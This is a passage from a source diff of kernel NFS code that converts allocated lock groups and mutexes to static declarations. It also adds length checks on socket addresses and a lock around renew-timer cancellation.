@@ -1832,7 +1832,7 @@ nfsrv_cleanup(void)
        /*
         * Flush pending file write fsevents
         */
-       lck_mtx_lock(nfsrv_fmod_mutex);
+       lck_mtx_lock(&nfsrv_fmod_mutex);
        for (i = 0; i < NFSRVFMODHASHSZ; i++) {
                for (fp = LIST_FIRST(&nfsrv_fmod_hashtbl[i]); fp; fp = nfp) {
                        /*
@@ -1853,7 +1853,7 @@ nfsrv_cleanup(void)
                }
        }
        nfsrv_fmod_pending = 0;
-       lck_mtx_unlock(nfsrv_fmod_mutex);
+       lck_mtx_unlock(&nfsrv_fmod_mutex);
 #endif
 
        nfsrv_uc_cleanup();     /* Stop nfs socket up-call threads */
index b719f88a0b581eab4b7bd908a77c6ad01f06880f..4acf8cf13f864620f7b23af8f6276748734b40f2 100644 (file)
@@ -66,15 +66,15 @@ struct nfsrv_uc_arg {
 TAILQ_HEAD(nfsrv_uc_q, nfsrv_uc_arg);
 
 static struct nfsrv_uc_queue {
-       lck_mtx_t               *ucq_lock;
+       lck_mtx_t               ucq_lock;
        struct nfsrv_uc_q       ucq_queue[1];
        thread_t                ucq_thd;
        uint32_t                ucq_flags;
 } nfsrv_uc_queue_tbl[NFS_UC_HASH_SZ];
 #define NFS_UC_QUEUE_SLEEPING   0x0001
 
-static lck_grp_t *nfsrv_uc_group;
-static lck_mtx_t *nfsrv_uc_shutdown_lock;
+static LCK_GRP_DECLARE(nfsrv_uc_group, "nfs_upcall_locks");
+static LCK_MTX_DECLARE(nfsrv_uc_shutdown_lock, &nfsrv_uc_group);
 static volatile int nfsrv_uc_shutdown = 0;
 static int32_t nfsrv_uc_thread_count;
 
@@ -100,18 +100,18 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused)
 
        DPRINT("nfsrv_uc_thread %d started\n", qi);
        while (!nfsrv_uc_shutdown) {
-               lck_mtx_lock(myqueue->ucq_lock);
+               lck_mtx_lock(&myqueue->ucq_lock);
 
                while (!nfsrv_uc_shutdown && TAILQ_EMPTY(myqueue->ucq_queue)) {
                        myqueue->ucq_flags |= NFS_UC_QUEUE_SLEEPING;
-                       error = msleep(myqueue, myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL);
+                       error = msleep(myqueue, &myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL);
                        myqueue->ucq_flags &= ~NFS_UC_QUEUE_SLEEPING;
                        if (error) {
                                printf("nfsrv_uc_thread received error %d\n", error);
                        }
                }
                if (nfsrv_uc_shutdown) {
-                       lck_mtx_unlock(myqueue->ucq_lock);
+                       lck_mtx_unlock(&myqueue->ucq_lock);
                        break;
                }
 
@@ -123,7 +123,7 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused)
 
                ep->nua_flags &= ~NFS_UC_QUEUED;
 
-               lck_mtx_unlock(myqueue->ucq_lock);
+               lck_mtx_unlock(&myqueue->ucq_lock);
 
 #ifdef NFS_UC_Q_DEBUG
                OSDecrementAtomic(&nfsrv_uc_queue_count);
@@ -133,10 +133,10 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused)
                nfsrv_rcv(ep->nua_so, (void *)ep->nua_slp, ep->nua_waitflag);
        }
 
-       lck_mtx_lock(nfsrv_uc_shutdown_lock);
+       lck_mtx_lock(&nfsrv_uc_shutdown_lock);
        nfsrv_uc_thread_count--;
        wakeup(&nfsrv_uc_thread_count);
-       lck_mtx_unlock(nfsrv_uc_shutdown_lock);
+       lck_mtx_unlock(&nfsrv_uc_shutdown_lock);
 
        thread_terminate(current_thread());
 }
@@ -160,7 +160,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp)
                return;
        }
        /* If we're queued we might race with nfsrv_uc_thread */
-       lck_mtx_lock(myqueue->ucq_lock);
+       lck_mtx_lock(&myqueue->ucq_lock);
        if (ap->nua_flags & NFS_UC_QUEUED) {
                printf("nfsrv_uc_dequeue remove %p\n", ap);
                TAILQ_REMOVE(myqueue->ucq_queue, ap, nua_svcq);
@@ -171,7 +171,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp)
        }
        FREE(slp->ns_ua, M_TEMP);
        slp->ns_ua = NULL;
-       lck_mtx_unlock(myqueue->ucq_lock);
+       lck_mtx_unlock(&myqueue->ucq_lock);
 }
 
 /*
@@ -180,16 +180,12 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp)
 void
 nfsrv_uc_init(void)
 {
-       int i;
-
-       nfsrv_uc_group = lck_grp_alloc_init("nfs_upcall_locks", LCK_GRP_ATTR_NULL);
-       for (i = 0; i < NFS_UC_HASH_SZ; i++) {
+       for (int i = 0; i < NFS_UC_HASH_SZ; i++) {
                TAILQ_INIT(nfsrv_uc_queue_tbl[i].ucq_queue);
-               nfsrv_uc_queue_tbl[i].ucq_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL);
+               lck_mtx_init(&nfsrv_uc_queue_tbl[i].ucq_lock, &nfsrv_uc_group, LCK_ATTR_NULL);
                nfsrv_uc_queue_tbl[i].ucq_thd = THREAD_NULL;
                nfsrv_uc_queue_tbl[i].ucq_flags = 0;
        }
-       nfsrv_uc_shutdown_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL);
 }
 
 /*
@@ -210,9 +206,9 @@ nfsrv_uc_start(void)
        DPRINT("nfsrv_uc_start\n");
 
        /* Wait until previous shutdown finishes */
-       lck_mtx_lock(nfsrv_uc_shutdown_lock);
+       lck_mtx_lock(&nfsrv_uc_shutdown_lock);
        while (nfsrv_uc_shutdown || nfsrv_uc_thread_count > 0) {
-               msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL);
+               msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL);
        }
 
        /* Start up-call threads */
@@ -234,7 +230,7 @@ out:
        nfsrv_uc_queue_count = 0ULL;
        nfsrv_uc_queue_max_seen = 0ULL;
 #endif
-       lck_mtx_unlock(nfsrv_uc_shutdown_lock);
+       lck_mtx_unlock(&nfsrv_uc_shutdown_lock);
 }
 
 /*
@@ -252,15 +248,15 @@ nfsrv_uc_stop(void)
        /* Signal up-call threads to stop */
        nfsrv_uc_shutdown = 1;
        for (i = 0; i < thread_count; i++) {
-               lck_mtx_lock(nfsrv_uc_queue_tbl[i].ucq_lock);
+               lck_mtx_lock(&nfsrv_uc_queue_tbl[i].ucq_lock);
                wakeup(&nfsrv_uc_queue_tbl[i]);
-               lck_mtx_unlock(nfsrv_uc_queue_tbl[i].ucq_lock);
+               lck_mtx_unlock(&nfsrv_uc_queue_tbl[i].ucq_lock);
        }
 
        /* Wait until they are done shutting down */
-       lck_mtx_lock(nfsrv_uc_shutdown_lock);
+       lck_mtx_lock(&nfsrv_uc_shutdown_lock);
        while (nfsrv_uc_thread_count > 0) {
-               msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL);
+               msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL);
        }
 
        /* Deallocate old threads */
@@ -273,7 +269,7 @@ nfsrv_uc_stop(void)
 
        /* Enable restarting */
        nfsrv_uc_shutdown = 0;
-       lck_mtx_unlock(nfsrv_uc_shutdown_lock);
+       lck_mtx_unlock(&nfsrv_uc_shutdown_lock);
 }
 
 /*
@@ -296,13 +292,13 @@ nfsrv_uc_cleanup(void)
        for (i = 0; i < NFS_UC_HASH_SZ; i++) {
                struct nfsrv_uc_queue *queue = &nfsrv_uc_queue_tbl[i];
 
-               lck_mtx_lock(queue->ucq_lock);
+               lck_mtx_lock(&queue->ucq_lock);
                while (!TAILQ_EMPTY(queue->ucq_queue)) {
                        struct nfsrv_uc_arg *ep = TAILQ_FIRST(queue->ucq_queue);
                        TAILQ_REMOVE(queue->ucq_queue, ep, nua_svcq);
                        ep->nua_flags &= ~NFS_UC_QUEUED;
                }
-               lck_mtx_unlock(queue->ucq_lock);
+               lck_mtx_unlock(&queue->ucq_lock);
        }
 
        nfsrv_uc_stop();
@@ -323,11 +319,11 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag)
        int qi = uap->nua_qi;
        struct nfsrv_uc_queue *myqueue = &nfsrv_uc_queue_tbl[qi];
 
-       lck_mtx_lock(myqueue->ucq_lock);
+       lck_mtx_lock(&myqueue->ucq_lock);
        DPRINT("nfsrv_uc_proxy called for %p (%p)\n", uap, uap->nua_slp);
        DPRINT("\tUp-call queued on %d for wakeup of %p\n", qi, myqueue);
        if (uap == NULL || uap->nua_flags & NFS_UC_QUEUED) {
-               lck_mtx_unlock(myqueue->ucq_lock);
+               lck_mtx_unlock(&myqueue->ucq_lock);
                return;  /* Already queued or freed */
        }
 
@@ -355,7 +351,7 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag)
                }
        }
 #endif
-       lck_mtx_unlock(myqueue->ucq_lock);
+       lck_mtx_unlock(&myqueue->ucq_lock);
 }
 
 
index 82e3c594c2ec2883fdd8369ec144cb713c7c90b2..482f8f758dbb130b4ae317fd9d1517972a359892 100644 (file)
@@ -134,8 +134,9 @@ ZONE_DECLARE(nfsmnt_zone, "NFS mount",
     sizeof(struct nfsmount), ZC_ZFREE_CLEARMEM);
 
 int nfs_ticks;
-static lck_grp_t *nfs_global_grp, *nfs_mount_grp;
-lck_mtx_t *nfs_global_mutex;
+static LCK_GRP_DECLARE(nfs_global_grp, "nfs_global");
+static LCK_GRP_DECLARE(nfs_mount_grp, "nfs_mount");
+LCK_MTX_DECLARE(nfs_global_mutex, &nfs_global_grp);
 uint32_t nfs_fs_attr_bitmap[NFS_ATTR_BITMAP_LEN];
 uint32_t nfs_object_attr_bitmap[NFS_ATTR_BITMAP_LEN];
 uint32_t nfs_getattr_bitmap[NFS_ATTR_BITMAP_LEN];
@@ -144,8 +145,8 @@ struct nfsclientidlist nfsclientids;
 
 /* NFS requests */
 struct nfs_reqqhead nfs_reqq;
-lck_grp_t *nfs_request_grp;
-lck_mtx_t *nfs_request_mutex;
+LCK_GRP_DECLARE(nfs_request_grp, "nfs_request");
+LCK_MTX_DECLARE(nfs_request_mutex, &nfs_request_grp);
 thread_call_t nfs_request_timer_call;
 int nfs_request_timer_on;
 u_int64_t nfs_xid = 0;
@@ -154,7 +155,7 @@ u_int64_t nfs_xidwrap = 0;              /* to build a (non-wrapping) 64 bit xid
 thread_call_t nfs_buf_timer_call;
 
 /* NFSv4 */
-lck_grp_t *nfs_open_grp;
+LCK_GRP_DECLARE(nfs_open_grp, "nfs_open");
 uint32_t nfs_open_owner_seqnum = 0;
 uint32_t nfs_lock_owner_seqnum = 0;
 thread_call_t nfs4_callback_timer_call;
@@ -162,8 +163,8 @@ int nfs4_callback_timer_on = 0;
 char nfs4_default_domain[MAXPATHLEN];
 
 /* nfsiod */
-lck_grp_t *nfsiod_lck_grp;
-lck_mtx_t *nfsiod_mutex;
+static LCK_GRP_DECLARE(nfsiod_lck_grp, "nfsiod");
+LCK_MTX_DECLARE(nfsiod_mutex, &nfsiod_lck_grp);
 struct nfsiodlist nfsiodfree, nfsiodwork;
 struct nfsiodmountlist nfsiodmounts;
 int nfsiod_thread_count = 0;
@@ -322,26 +323,11 @@ nfs_vfs_init(__unused struct vfsconf *vfsp)
        TAILQ_INIT(&nfsiodfree);
        TAILQ_INIT(&nfsiodwork);
        TAILQ_INIT(&nfsiodmounts);
-       nfsiod_lck_grp = lck_grp_alloc_init("nfsiod", LCK_GRP_ATTR_NULL);
-       nfsiod_mutex = lck_mtx_alloc_init(nfsiod_lck_grp, LCK_ATTR_NULL);
-
-       /* init lock groups, etc. */
-       nfs_mount_grp = lck_grp_alloc_init("nfs_mount", LCK_GRP_ATTR_NULL);
-       nfs_open_grp = lck_grp_alloc_init("nfs_open", LCK_GRP_ATTR_NULL);
-       nfs_global_grp = lck_grp_alloc_init("nfs_global", LCK_GRP_ATTR_NULL);
-
-       nfs_global_mutex = lck_mtx_alloc_init(nfs_global_grp, LCK_ATTR_NULL);
-
-       /* init request list mutex */
-       nfs_request_grp = lck_grp_alloc_init("nfs_request", LCK_GRP_ATTR_NULL);
-       nfs_request_mutex = lck_mtx_alloc_init(nfs_request_grp, LCK_ATTR_NULL);
 
        /* initialize NFS request list */
        TAILQ_INIT(&nfs_reqq);
 
        nfs_nbinit();                   /* Init the nfsbuf table */
-       nfs_nhinit();                   /* Init the nfsnode table */
-       nfs_lockinit();                 /* Init the nfs lock state */
 #if CONFIG_NFS_GSS
        nfs_gss_init();                 /* Init RPCSEC_GSS security */
 #endif
@@ -1777,12 +1763,22 @@ nfs_convert_old_nfs_args(mount_t mp, user_addr_t data, vfs_context_t ctx, int ar
 
        /* convert address to universal address string */
        if (ss.ss_family == AF_INET) {
-               sinaddr = &((struct sockaddr_in*)&ss)->sin_addr;
+               if (ss.ss_len != sizeof(struct sockaddr_in)) {
+                       error = EINVAL;
+               } else {
+                       sinaddr = &((struct sockaddr_in*)&ss)->sin_addr;
+               }
        } else if (ss.ss_family == AF_INET6) {
-               sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr;
+               if (ss.ss_len != sizeof(struct sockaddr_in6)) {
+                       error = EINVAL;
+               } else {
+                       sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr;
+               }
        } else {
                sinaddr = NULL;
        }
+       nfsmout_if(error);
+
        if (!sinaddr || (inet_ntop(ss.ss_family, sinaddr, uaddr, sizeof(uaddr)) != uaddr)) {
                error = EINVAL;
                goto nfsmout;
@@ -2377,6 +2373,7 @@ nfs4_mount(
 
        *npp = NULL;
        fh.fh_len = dirfh.fh_len = 0;
+       lck_mtx_init(&nmp->nm_timer_lock, &nfs_mount_grp, LCK_ATTR_NULL);
        TAILQ_INIT(&nmp->nm_open_owners);
        TAILQ_INIT(&nmp->nm_delegations);
        TAILQ_INIT(&nmp->nm_dreturnq);
@@ -2776,7 +2773,7 @@ gotfh:
        }
 
        /* set up lease renew timer */
-       nmp->nm_renew_timer = thread_call_allocate(nfs4_renew_timer, nmp);
+       nmp->nm_renew_timer = thread_call_allocate_with_options(nfs4_renew_timer, nmp, THREAD_CALL_PRIORITY_HIGH, THREAD_CALL_OPTIONS_ONCE);
        interval = nmp->nm_fsattr.nfsa_lease / 2;
        if (interval < 1) {
                interval = 1;
@@ -2990,7 +2987,7 @@ mountnfs(
        } else {
                /* allocate an NFS mount structure for this mount */
                nmp = zalloc_flags(nfsmnt_zone, Z_WAITOK | Z_ZERO);
-               lck_mtx_init(&nmp->nm_lock, nfs_mount_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&nmp->nm_lock, &nfs_mount_grp, LCK_ATTR_NULL);
                TAILQ_INIT(&nmp->nm_resendq);
                TAILQ_INIT(&nmp->nm_iodq);
                TAILQ_INIT(&nmp->nm_gsscl);
@@ -4583,7 +4580,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr)
                vfs_unmountbyfsid(&hinfo.fsid, 0, vfs_context_kernel());
        }
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (!hinfo.mountcount) {
                /* no more ephemeral mounts - don't need timer */
                nfs_ephemeral_mount_harvester_on = 0;
@@ -4593,7 +4590,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr)
                thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline);
                nfs_ephemeral_mount_harvester_on = 1;
        }
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        /* thread done */
        thread_terminate(current_thread());
@@ -4607,9 +4604,9 @@ nfs_ephemeral_mount_harvester_start(void)
 {
        uint64_t deadline;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (nfs_ephemeral_mount_harvester_on) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        if (nfs_ephemeral_mount_harvester_timer == NULL) {
@@ -4618,7 +4615,7 @@ nfs_ephemeral_mount_harvester_start(void)
        clock_interval_to_deadline(NFS_EPHEMERAL_MOUNT_HARVEST_INTERVAL, NSEC_PER_SEC, &deadline);
        thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline);
        nfs_ephemeral_mount_harvester_on = 1;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 }
 
 #endif
@@ -4635,7 +4632,10 @@ nfs3_check_lockmode(struct nfsmount *nmp, struct sockaddr *sa, int sotype, int t
        int error, port = 0;
 
        if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) {
-               bcopy(sa, &ss, sa->sa_len);
+               if (sa->sa_len > sizeof(ss)) {
+                       return EINVAL;
+               }
+               bcopy(sa, &ss, MIN(sa->sa_len, sizeof(ss)));
                error = nfs_portmap_lookup(nmp, vfs_context_current(), (struct sockaddr*)&ss, NULL, RPCPROG_STAT, RPCMNT_VER1, NM_OMFLAG(nmp, MNTUDP) ? SOCK_DGRAM : sotype, timeo);
                if (!error) {
                        if (ss.ss_family == AF_INET) {
@@ -5077,10 +5077,13 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
 
        /* cancel any renew timer */
        if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_renew_timer) {
+               lck_mtx_lock(&nmp->nm_timer_lock);
                thread_call_cancel(nmp->nm_renew_timer);
                thread_call_free(nmp->nm_renew_timer);
                nmp->nm_renew_timer = NULL;
+               lck_mtx_unlock(&nmp->nm_timer_lock);
        }
+
 #endif
        lck_mtx_unlock(&nmp->nm_lock);
 
@@ -5102,14 +5105,14 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
 #if CONFIG_NFS4
        if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_longid) {
                /* remove/deallocate the client ID data */
-               lck_mtx_lock(nfs_global_mutex);
+               lck_mtx_lock(&nfs_global_mutex);
                TAILQ_REMOVE(&nfsclientids, nmp->nm_longid, nci_link);
                if (nmp->nm_longid->nci_id) {
                        FREE(nmp->nm_longid->nci_id, M_TEMP);
                }
                FREE(nmp->nm_longid, M_TEMP);
                nmp->nm_longid = NULL;
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
        }
 #endif
        /*
@@ -5117,7 +5120,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
         * and removed from the resend queue.
         */
        TAILQ_INIT(&resendq);
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(req, &nfs_reqq, r_chain) {
                if (req->r_nmp == nmp) {
                        lck_mtx_lock(&req->r_mtx);
@@ -5142,7 +5145,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
                        lck_mtx_unlock(&req->r_mtx);
                }
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        /* Since we've drop the request mutex we can now safely unreference the request */
        TAILQ_FOREACH_SAFE(req, &resendq, r_rchain, treq) {
@@ -5159,8 +5162,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
         * local iod queue for processing.
         */
        TAILQ_INIT(&iodq);
-       lck_mtx_lock(nfs_request_mutex);
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        TAILQ_FOREACH(req, &nfs_reqq, r_chain) {
                if (req->r_nmp == nmp) {
                        lck_mtx_lock(&req->r_mtx);
@@ -5188,8 +5191,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
                TAILQ_REMOVE(&nfsiodmounts, nmp, nm_iodlink);
        }
        TAILQ_CONCAT(&iodq, &nmp->nm_iodq, r_achain);
-       lck_mtx_unlock(nfsiod_mutex);
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfsiod_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) {
                TAILQ_REMOVE(&iodq, req, r_achain);
@@ -5294,11 +5297,17 @@ nfs_mount_cleanup(struct nfsmount *nmp)
 
        lck_mtx_unlock(&nmp->nm_lock);
 
-       lck_mtx_destroy(&nmp->nm_lock, nfs_mount_grp);
+       lck_mtx_destroy(&nmp->nm_lock, &nfs_mount_grp);
        if (nmp->nm_fh) {
                NFS_ZFREE(nfs_fhandle_zone, nmp->nm_fh);
        }
 
+#if CONFIG_NFS4
+       if (nmp->nm_vers >= NFS_VER4) {
+               lck_mtx_destroy(&nmp->nm_timer_lock, &nfs_mount_grp);
+       }
+#endif
+
 
        NFS_ZFREE(nfsmnt_zone, nmp);
 }
@@ -6685,7 +6694,7 @@ ustat_skip:
                 * how long the threads have been waiting.
                 */
 
-               lck_mtx_lock(nfs_request_mutex);
+               lck_mtx_lock(&nfs_request_mutex);
                lck_mtx_lock(&nmp->nm_lock);
 
                /*
@@ -6704,19 +6713,19 @@ ustat_skip:
 
                if (req->oldptr == USER_ADDR_NULL) {            // Caller is querying buffer size
                        lck_mtx_unlock(&nmp->nm_lock);
-                       lck_mtx_unlock(nfs_request_mutex);
+                       lck_mtx_unlock(&nfs_request_mutex);
                        return SYSCTL_OUT(req, NULL, totlen);
                }
                if (req->oldlen < totlen) {     // Check if caller's buffer is big enough
                        lck_mtx_unlock(&nmp->nm_lock);
-                       lck_mtx_unlock(nfs_request_mutex);
+                       lck_mtx_unlock(&nfs_request_mutex);
                        return ERANGE;
                }
 
                MALLOC(nsp, struct netfs_status *, totlen, M_TEMP, M_WAITOK | M_ZERO);
                if (nsp == NULL) {
                        lck_mtx_unlock(&nmp->nm_lock);
-                       lck_mtx_unlock(nfs_request_mutex);
+                       lck_mtx_unlock(&nfs_request_mutex);
                        return ENOMEM;
                }
                timeoutmask = NFSSTA_TIMEO | NFSSTA_LOCKTIMEO | NFSSTA_JUKEBOXTIMEO;
@@ -6760,7 +6769,7 @@ ustat_skip:
                }
 
                lck_mtx_unlock(&nmp->nm_lock);
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
 
                error = SYSCTL_OUT(req, nsp, totlen);
                FREE(nsp, M_TEMP);
index b03463b43b07dd51c4b72c14687de27effd85bb9..caa5533f53bbf8e9db612e93f442eb7ed7d20cc3 100644 (file)
@@ -4481,13 +4481,13 @@ again_relock:
        }
 
        /* lock the node while we remove the file */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        while (np->n_hflag & NHLOCKED) {
                np->n_hflag |= NHLOCKWANT;
-               msleep(np, nfs_node_hash_mutex, PINOD, "nfs_remove", NULL);
+               msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_remove", NULL);
        }
        np->n_hflag |= NHLOCKED;
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        if (!namedattrs) {
                nfs_dulookup_init(dul, dnp, cnp->cn_nameptr, cnp->cn_namelen, ctx);
@@ -4510,13 +4510,13 @@ again:
        if (!inuse || (np->n_sillyrename && (nvattr->nva_nlink > 1))) {
                if (!inuse && !flushed) { /* flush all the buffers first */
                        /* unlock the node */
-                       lck_mtx_lock(nfs_node_hash_mutex);
+                       lck_mtx_lock(&nfs_node_hash_mutex);
                        np->n_hflag &= ~NHLOCKED;
                        if (np->n_hflag & NHLOCKWANT) {
                                np->n_hflag &= ~NHLOCKWANT;
                                wakeup(np);
                        }
-                       lck_mtx_unlock(nfs_node_hash_mutex);
+                       lck_mtx_unlock(&nfs_node_hash_mutex);
                        nfs_node_clear_busy2(dnp, np);
                        error = nfs_vinvalbuf(vp, V_SAVE, ctx, 1);
                        FSDBG(260, np, np->n_size, np->n_vattr.nva_size, 0xf00d0011);
@@ -4569,13 +4569,13 @@ again:
                         * again if another object gets created with the same filehandle
                         * before this vnode gets reclaimed
                         */
-                       lck_mtx_lock(nfs_node_hash_mutex);
+                       lck_mtx_lock(&nfs_node_hash_mutex);
                        if (np->n_hflag & NHHASHED) {
                                LIST_REMOVE(np, n_hash);
                                np->n_hflag &= ~NHHASHED;
                                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                        }
-                       lck_mtx_unlock(nfs_node_hash_mutex);
+                       lck_mtx_unlock(&nfs_node_hash_mutex);
                        /* clear flags now: won't get nfs_vnop_inactive for recycled vnode */
                        /* clear all flags other than these */
                        nfs_node_lock_force(np);
@@ -4613,13 +4613,13 @@ again:
        }
 out:
        /* unlock the node */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        np->n_hflag &= ~NHLOCKED;
        if (np->n_hflag & NHLOCKWANT) {
                np->n_hflag &= ~NHLOCKWANT;
                wakeup(np);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
        nfs_node_clear_busy2(dnp, np);
        if (setsize) {
                ubc_setsize(vp, 0);
@@ -4758,13 +4758,13 @@ nfs_vnop_rename(
 
        if (tvp && (tvp != fvp)) {
                /* lock the node while we rename over the existing file */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                while (tnp->n_hflag & NHLOCKED) {
                        tnp->n_hflag |= NHLOCKWANT;
-                       msleep(tnp, nfs_node_hash_mutex, PINOD, "nfs_rename", NULL);
+                       msleep(tnp, &nfs_node_hash_mutex, PINOD, "nfs_rename", NULL);
                }
                tnp->n_hflag |= NHLOCKED;
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                locked = 1;
        }
 
@@ -4819,7 +4819,7 @@ nfs_vnop_rename(
                tvprecycle = (!error && !vnode_isinuse(tvp, 0) &&
                    (nfs_getattrcache(tnp, nvattr, 0) || (nvattr->nva_nlink == 1)));
                nfs_node_unlock(tnp);
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                if (tvprecycle && (tnp->n_hflag & NHHASHED)) {
                        /*
                         * remove nfsnode from hash now so we can't accidentally find it
@@ -4830,7 +4830,7 @@ nfs_vnop_rename(
                        tnp->n_hflag &= ~NHHASHED;
                        FSDBG(266, 0, tnp, tnp->n_flag, 0xb1eb1e);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
 
        /* purge the old name cache entries and enter the new one */
@@ -4878,13 +4878,13 @@ out:
        nfs_getattr(tdnp, NULL, ctx, NGA_CACHED);
        if (locked) {
                /* unlock node */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                tnp->n_hflag &= ~NHLOCKED;
                if (tnp->n_hflag & NHLOCKWANT) {
                        tnp->n_hflag &= ~NHLOCKWANT;
                        wakeup(tnp);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
        nfs_node_clear_busy4(fdnp, fnp, tdnp, tnp);
        FREE(nvattr, M_TEMP);
@@ -5561,13 +5561,13 @@ nfsmout:
                 * again if another object gets created with the same filehandle
                 * before this vnode gets reclaimed
                 */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                if (np->n_hflag & NHHASHED) {
                        LIST_REMOVE(np, n_hash);
                        np->n_hflag &= ~NHHASHED;
                        FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
        NFS_ZFREE(nfs_req_zone, req);
        FREE(dul, M_TEMP);
@@ -5857,8 +5857,8 @@ out:
  * Invalidate cached directory information, except for the actual directory
  * blocks (which are invalidated separately).
  */
-void
-nfs_invaldir(nfsnode_t dnp)
+static void
+nfs_invaldir_cookies(nfsnode_t dnp)
 {
        if (vnode_vtype(NFSTOV(dnp)) != VDIR) {
                return;
@@ -5873,6 +5873,13 @@ nfs_invaldir(nfsnode_t dnp)
        memset(dnp->n_cookiecache->next, -1, NFSNUMCOOKIES);
 }
 
+void
+nfs_invaldir(nfsnode_t dnp)
+{
+
+       nfs_invaldir_cookies(dnp);
+}
+
 /*
  * calculate how much space is available for additional directory entries.
  */
@@ -6037,7 +6044,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp)
        dpptc = NULL;
        found = 0;
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        /*
         * Scan the list of buffers, keeping them in order.
         * Note that itercomplete inserts each of the remaining buffers
@@ -6099,7 +6106,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp)
                }
                nfs_buf_itercomplete(dnp, &blist, NBI_CLEAN);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        if (found) {
                OSAddAtomic64(1, &nfsstats.direofcache_hits);
                return 0;
@@ -6250,7 +6257,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn
                lbn = nextlbn;
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (found) {
